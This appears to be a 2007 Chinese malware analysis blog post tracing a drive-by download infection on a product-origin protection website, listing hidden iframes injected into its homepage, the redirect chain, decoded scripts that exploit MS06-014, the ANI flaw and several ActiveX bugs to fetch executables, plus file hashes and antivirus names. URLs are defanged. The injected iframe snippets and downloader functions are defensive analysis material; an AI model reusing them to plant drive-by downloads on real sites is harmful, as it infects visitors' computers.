某原产地保护信息网被挂马Worm.Win32.QQPass.at等

某原产地保护信息网被挂马Worm.Win32.QQPass.at等

endurer 原创
2007-11-09 第1版

打开该网站，Kaspersky 报告：
/---
已检测到: 木马程序 Trojan-Clicker.HTML.IFrame.dk URL: hxxp://x*x.9***36*5.org/ip/1.htm
已检测到: 木马程序 Trojan-Clicker.HTML.IFrame.dk URL: hxxp://a*c**c.j*qx*x.org/live/index.htm
---/

检查主页代码，发现：
/---
＜iframe src="hxxp://x*x.9***36*5.org/ip/1.htm" width=100 height=0＞＜/iframe＞
＜iframe src=hxxp://a*c**c.j*qx*x.org/live/index.htm width=100 height=0＞＜/iframe＞
＜iframe src="hxxp://b*oc*.s*b**b*22.com/home/index.htm" width=20 height=0＞＜/iframe＞

＜iframe src="hxxp://www.gxycd.com.cn/images/xs.htm" width="0" height="0" frameborder="0"＞＜/iframe＞
---/

hxxp://x*x.9***36*5.org/ip/1.htm 的内容为：
/---
＜iframe src="hxxp://web**.2*0**08yi*.com/" width=0 height=0＞＜/iframe＞
＜iframe src="hxxp://web**.2*0**08yi*.com/dyy.htm" width=0 height=0＞＜/iframe＞ 
＜iframe src="hxxp://a*bc.d*jx**cn.com/abc/index.htm" width=50 height=0＞＜/iframe＞
---/

hxxp://web**.2*0**08yi*.com 的内容为：
/---
＜iframe src="hxxp://a*a*.1*8d**d.net/ww/new82.htm" width=0 height=0＞＜/iframe＞
---/

hxxp://a*a*.1*8d**d.net/ww/new82.htm 包含代码：
/---
＜iframe width='0' height='0' src='hxxp://a*a*.1*8d**d.net/aa/ki.htm'＞＜/iframe＞
---/

hxxp://a*a*.1*8d**d.net/aa/ki.htm 包含JavaScript脚本，经2次解密得到源代码，
功能是检查cookie变量OK，若不存在则创建，并输出代码：
/---
＜script src=hxxp://a*a*.1*8d**d.net/aa/1.js＞＜/script＞
＜script src=hxxp://a*a*.1*8d**d.net/aa/b.js＞＜/script＞
＜script src=hxp://a*a*.1*8d**d.net/aa/pps.js＞＜/script＞
＜iframe width='10' height='10' src='hxxp://a*a*.1*8d**d.net/aa/baofeng.html'＞＜/iframe＞
---/

并利用 暴风影音漏洞、BaiduBar.Tool 下载 hxxp://down.1*8d**d.net/bb/bd.cab。

hxxp://web**.2*0**08yi*.com/dyy.htm 的内容为：
/---
＜iframe src="hxxp://b**bb.m*m*52*08.com/df.htm" width=0 height=0＞＜/iframe＞
＜iframe src="hxxp://ma*t.j*qx*x*.org/tt.htm" width=0 height=0＞＜/iframe＞
---/

hxxp://a*c**c.j*qx*x.org/live/index.htm 的内容为：
/---
＜iframe src="hxxp://web**.2*0**08yi*.com/" width=0 height=0＞＜/iframe＞
＜iframe src="hxxp://web**.2*0**08yi*.com/dyy.htm" width=0 height=0＞＜/iframe＞ 
＜iframe src="hxxp://a*bc.d*jx**cn.com/abc/index.htm" width=50 height=0＞＜/iframe＞
---/

hxxp://b*oc*.s*b**b*22.com/home/index.htm 的内容为：
/---
＜iframe src="hxxp://b*oc*.s*b**b*22.com/" width=0 height=0＞＜/iframe＞
＜iframe src="hxxp://b**bb.m*m*52*08.com/df.htm" width=0 height=0＞＜/iframe＞
＜iframe src="hxxp://ma*t.j*qx*x*.org/tt.htm" width=0 height=0＞＜/iframe＞
＜iframe src="hxxp://a*bc.d*jx**cn.com/abc/index.htm" width=50 height=0＞＜/iframe＞
---/

hxxp://b*oc*.s*b**b*22.com/ 的内容为：
/---
＜iframe src="hxxp://a*a*.1*8d**d.net/ww/new82.htm" width=0 height=0＞＜/iframe＞
---/

hxxp://b**bb.m*m*52*08.com/df.htm 的内容为：
/---
＜iframe src="hxxp://www.i*p**5*30.com/bala.htm" width=1 height=1＞＜/iframe＞
---/

hxxp://www.i*p**5*30.com/bala.htm 包含代码：
/---
＜iframe width='100' height='100' src='wm/s223.htm'＞＜/iframe＞
＜iframe width='100' height='100' src='wm/du7.htm'＞＜/iframe＞
＜iframe width='100' height='100' src='wm/bu5.htm'＞＜/iframe＞
---/

hxxp://www.i*p**5*30.com/wm/s223.htm 的内容为：
/---
＜script language=javascript src=s321.js＞＜/script＞
---/

hxxp://www.i*p**5*30.com/wm/s321.js 经过2次解密得到源代码，功能是利用 MS06-014 漏洞 下载 hxxp://www.i*p**5*30.com/down.exe，保存到 %windir%，文件名由自定义函数：
/---
ｆｕｎｃｔｉｏｎ ｙＧｊｎｈ２（ＲｇＩ５ｄ）｛ｖａｒ ｗｗｗ＝"";ｖａｒ ｏｖｅＡＳ３＝Ｍａｔｈ．ｒａｎｄｏｍ（）＊ＲｇＩ５ｄ;ｒｅｔｕｒｎ'～ｔｍｐ'＋Ｍａｔｈ．ｒｏｕｎｄ（ｏｖｅＡＳ３）＋'．ｅｘｅ'｝
---/
生成，即~tmp****.exe，****为数字，通过cmd.exe来启动。

文件说明符 : D:/test/down.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-11-6 21:50:26
修改时间 : 2007-11-6 21:50:28
访问时间 : 2007-11-6 0:0:0
大小 : 17967 字节 17.559 KB
MD5 : 33ab065beb165e42a59f6c1a5e4a7e4e
SHA1: EAE693BE65E601116AFB639C66EE9EF1EA625469
CRC32: 8e1e4618

Scanned file:   down.exe  - Infected
down.exe - infected by Worm.Win32.QQPass.at

hxxp://www.i*p**5*30.com/wm/du7.htm 中的 JavaScript 脚本，经过2次解密得到源代码，功能是利用 Baidu bar（ＣＬＳＩＤ:｛Ａ７Ｆ０５ＥＥ４－０４２６－４５４Ｆ－８０１３－Ｃ４１Ｅ３５９６Ｅ９Ｅ９｝）下载hxxp://*2*6**8i*p**.com/baidu1.cab。

baidu1.cab 包含的文件 baidu.exe 与 down.exe 相同。

hxxp://www.i*p**5*30.com/wm/bu5.htm 中的 JavaScript 脚本，经过2次解密得到源代码，是暴风影音漏洞利用代码。

hxxp://ma*t.j*qx*x*.org/tt.htm 包含代码：
/---
＜iframe src="hxxp://e*e*e*.j*open*q*c*.com/xm20.htm" width=20 height=0＞＜/iframe＞
---/

hxxp://e*e*e*.j*open*q*c*.com/xm20.htm 包含代码：
/---
＜HTML＞
＜script src=hxxp://e*e*e*.j*open*q*c*.com/ee/e.js＞＜/script＞
＜/HTML＞
＜iframe src="hxxp://e*e*e*.j*open*q*c*.com/ee/ee1.htm" width="100" height="0" frameborder="0"＞＜/iframe＞
＜iframe src="hxxp://e*e*e*.j*open*q*c*.com/ee/ee2.htm" width="100" height="0" frameborder="0"＞＜/iframe＞
＜iframe src="hxxp://e*e*e*.j*open*q*c*.com/ee/ee3.htm" width="100" height="0" frameborder="0"＞＜/iframe＞
＜iframe src="hxxp://e*e*e*.j*open*q*c*.com/ee/ee4.htm" width="100" height="0" frameborder="0"＞＜/iframe＞
＜iframe src="hxxp://e*e*e*.j*open*q*c*.com/ee/ee5.htm" width="100" height="0" frameborder="0"＞＜/iframe＞
＜iframe src="hxxp://e*e*e*.j*open*q*c*.com/ee/ee6.htm" width="100" height="0" frameborder="0"＞＜/iframe＞
＜iframe src="hxxp://e*e*e*.j*open*q*c*.com/ee/ee.htm" width="100" height="0" frameborder="0"＞＜/iframe＞
---/

hxxp://e*e*e*.j*open*q*c*.com/ee/e.js
Kaspersky 报为: 木马程序 Trojan-Downloader.JS.Psyme.sf
其内容经过1次解密得到源代码，功能为利用 MS06-014 漏洞 下载：hxxp://e*e*e*.j*open*q*c*.com/eeecom.exe，保存到 %windir%，文件名由自定义函数：
/---
ｆｕｎｃｔｉｏｎ ＧｅｔＲａｎ（ｍ）
｛
 ｖａｒ ＮｕｍｂｅｒＲａｎ ＝ Ｍａｔｈ．ｒａｎｄｏｍ（）＊ｍ;
ａｉｈａｏ＝'';
 ｒｅｔｕｒｎ '～Ｔｅｍｐ'＋Ｍａｔｈ．ｒｏｕｎｄ（ＮｕｍｂｅｒＲａｎ）＋'．ｔｍｐ';
｝
---/
生成，即~tmp****.tmp，****为数字，通过cmd.exe来启动。

文件说明符 : D:/test/eeecom.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-11-9 14:16:54
修改时间 : 2007-11-9 14:16:55
访问时间 : 2007-11-9 14:17:17
大小 : 20284 字节 19.828 KB
MD5 : edcd02800c270bcb44956e08b422c9d4
SHA1: CD728C2655E7BA1DC694EFB6DBBD3D07033FA5CC
CRC32: 1c0d5f8a
已检测到: 病毒 Worm.Win32.Downloader.ag 文件: D:/test/eeecom.exe/PE_Patch/UPack

hxxp://e*e*e*.j*open*q*c*.com/ee/ee1.htm 内容为：
/---
＜script language=javascript src=hxxp://e*e*e*.j*open*q*c*.com/ee/e2.js＞＜/script＞
＜script language=javascript src=hxxp://e*e*e*.j*open*q*c*.com/ee/e3.js＞＜/script＞
---/

hxxp://e*e*e*.j*open*q*c*.com/ee/e2.js 与 hxxp://e*e*e*.j*open*q*c*.com/ee/e.js　相同。

hxxp://e*e*e*.j*open*q*c*.com/ee/ee2.htm 的内容经过1次解密，得到源代码，功能是利用 Baidu bar 下载 hxxp://e*e*e*.j*open*q*c*.com/eeecom.cab。

eeecom.cab 包含文件 TestSign.exe 和 TestSign.ini。

文件说明符 : D:/test/TestSign.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-11-1 13:5:22
修改时间 : 2007-11-1 13:5:22
访问时间 : 2007-11-6 0:0:0
大小 : 20384 字节 19.928 KB
MD5 : 509dd358fb4b41aff6def3231bdf6b79
SHA1: DDA08A6E095C4501C363FB75F1BB129A54763ED9
CRC32: 53c62eca

Scanned file:   TestSign.exe  - Infected
TestSign.exe - infected by Worm.Win32.Downloader.w
瑞星报为：Backdoor.Win32.Agent.ymv

hxxp://e*e*e*.j*open*q*c*.com/ee/ee3.htm 包含代码：
/---
＜script language=javascript src=hxxp://e*e*e*.j*open*q*c*.com/ee/webxl.js＞＜/script＞
---/

hxxp://e*e*e*.j*open*q*c*.com/ee/webxl.js 的内容经过1次解密，得到源代码，功能是利用 MS06-014 漏洞 创建文件创建文件C:/Documents and Settings/All Users/「开始」菜单/程序/启动/microsofts.hta，其功能为利用 迅雷漏洞,调用 C:/Progra~1/Intern~1/IEXPLORE.EXE 打开 hxxp://e*e*e*.j*open*q*c*.com/ee/webxl.htm，下载并执行ysydown[1].exe。
其中有个变量名为：Qq275756717。

hxxp://e*e*e*.j*open*q*c*.com/ee/webxl.htm
/---
＜src="hxxp://e*e*e*.j*open*q*c*.com/eeecom.exe"＞＜/script＞
---/

hxxp://e*e*e*.j*open*q*c*.com/eeecom.exe 与 TestSign.exe 相同。

hxxp://e*e*e*.j*open*q*c*.com/ee/ee4.htm
Kapspersky报为 木马程序 Trojan-Downloader.VBS.Small.fw
包含 VBScript代码，经2次解密得到原代码，功能是利用 MS06-014 漏洞下载：hxxp://e*e*e*.j*open*q*c*.com/eeecom.exe，保存到 %windir%，文件名由自定义函数：
/---
ｆｕｎｃｔｉｏｎ ｇｎ（ｒＲａＧＥｙｋＵ１）｛ｖａｒ Ｏｒｈ２＝ｗｉｎｄｏｗ［"Ｍａｔｈ"］［"ｒａｎｄｏｍ"］（）＊ｒＲａＧＥｙｋＵ１;ｒｅｔｕｒｎ'～ｔｍｐ'＋'．ｔｍｐ'｝
---/
生成，即~tmp.tmp，通过cmd.exe来启动。

hxxp://e*e*e*.j*open*q*c*.com/ee/ee5.htm 包含代码：
/---
＜script language=javascript src=hxxp://e*e*e*.j*open*q*c*.com/ee/bb.js＞＜/script＞
---/

hxxp://e*e*e*.j*open*q*c*.com/ee/bb.js 执行自定义函数Kao_Kaspersky()，功能是检查cookie变量Cookie1，不存在则创建，并输出代码：
/---
＜iframe width=100 height=100 src="hxxp:////e*e*e*.j*open*q*c*.com//ee//bf.htm/"＞＜/iframe＞
---/

hxxp://e*e*e*.j*open*q*c*.com/ee/bf.htm
Kapspersky报为 恶意程序 Exploit.JS.Agent.bw

其内容经2次解密得到原代码，为暴风影音漏洞利用代码。

hxxp://e*e*e*.j*open*q*c*.com/ee/ee6.htm
Kapspersky报为 木马程序 Trojan-Downloader.JS.Small.hk

内容为jetAudio 7.x 漏洞利用代码。包含信息：
/---
jetAudio 7.x ActiveX DownloadFromMusicStore() 0day Remote Code Execution Exploit
Bug discovered by Krystian Kloskowski (h07) ＜h07@interia.pl＞
Tested on:..
- jetAudio 7.0.3 Basic
- Microsoft Internet Explorer 6
Just for fun  ;)
---/
经1次解密得到源代码，功能是分别利用 Yahoo! Messenger 控件 （ｃｌｓｉｄ:２４Ｆ３ＥＡＤ６－８Ｂ８７－４Ｃ１Ａ－９７ＤＡ－７１Ｃ１２６ＢＤＡ０８Ｆ ）漏洞 和 EDraw Office Viewer Component 5.2 ActiveX （ｃｌｓｉｄ:６ＢＡ２１Ｃ２２－５３Ａ５－４６３Ｆ－ＢＢＥ８－５ＣＦ７ＦＦＡ０１３２Ｂ）漏洞下载 hxxp://*60.190.101.206/**/abc.exe，保存为 c:/uu.exe 和 c:/test.exe 并运行。

文件说明符 : D:/test/abc.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-11-6 22:48:10
修改时间 : 2007-11-6 22:48:12
访问时间 : 2007-11-6 0:0:0
大小 : 20380 字节 19.924 KB
MD5 : ef943281ace810485223d61354d32de4
SHA1: 00F5000E139D662C60D5E46BF744D42DFC762D25
CRC32: 5fbde357

Scanned file:   abc.exe  - Infected
abc.exe - infected by Worm.Win32.Downloader.w

瑞星报为：D:/test/abc.exe＞＞upack0.39 Backdoor.Win32.Agent.ymv

hxxp://a*bc.d*jx**cn.com/abc/index.htm
Kapspersky报为 木马程序 Trojan.VBS.Small.ad
其内容包括
/---
＜iframe src=hxxp://a*bc.d*jx**cn.com/abc/xp017.htm width=50 height=0＞＜/iframe＞
---/
及VBScript脚本，经2次解密得到原代码，功能是利用 MS06-014 漏洞下载 hxxp://a*bc.d*jx**cn.com/abc/svcos.exe，保存为 OiZQdnX.com，创建 WKvXtGU.vbs 来启动。

文件说明符 : D:/test/svcos.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-11-6 13:14:48
修改时间 : 2007-11-6 13:15:38
访问时间 : 2007-11-6 13:16:50
大小 : 68096 字节 66.512 KB
MD5 : 7bbf143b15089d0ada39a323429bc7c4
SHA1: 2B3BE95F577AF7D22FDBA12454E6CFF61F023693
CRC32: c534f3f1

Kaspersky 报为 已检测到: 木马程序 Trojan-Downloader.Win32.Delf.ctx 文件: D:/test/svcos.exe
瑞星报为 Trojan.Win32.Agent.zri

hxxp://a*bc.d*jx**cn.com/abc/xp017.htm 内容为：
/---
＜DIV style="CURSOR: url(ah.c)"＞＜/DIV＞
＜script type="text/jscript"＞function init(){document.write("");}window.onload=init;＜/script＞
---/

hxxp://a*bc.d*jx**cn.com/abc/ah.c 利用 MS-07-002 / ANI漏洞 下载 hxxp://a*bc.d*jx**cn.com/abc/svcos.exe

hxxp://www.g*x*y*c**d.com.cn/images/xs.htm 未能打开。